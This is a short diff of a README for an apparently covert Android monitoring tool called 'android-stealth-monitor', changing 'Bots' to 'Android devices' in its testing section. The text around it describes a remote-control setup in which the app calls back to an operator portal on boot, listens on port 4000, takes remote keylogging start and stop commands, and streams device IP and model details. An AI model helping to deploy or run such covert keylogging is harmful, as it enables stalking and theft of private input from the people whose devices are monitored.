fherrera124/android-stealth-monitor/README.md

 6. The app will connect back to your portal on boot/service start.

 ### 4. Testing and Monitoring
-- Bots connect to port 4000; monitor Docker logs: `docker logs portal` or `docker compose logs`.
+- Android devices connect to port 4000; monitor Docker logs: `docker logs portal` or `docker compose logs`.
 - Use the UI to send "logger" commands (start/stop keylogging).
 - Device info (IP, model, etc.) updates in real-time via Socket.IO events.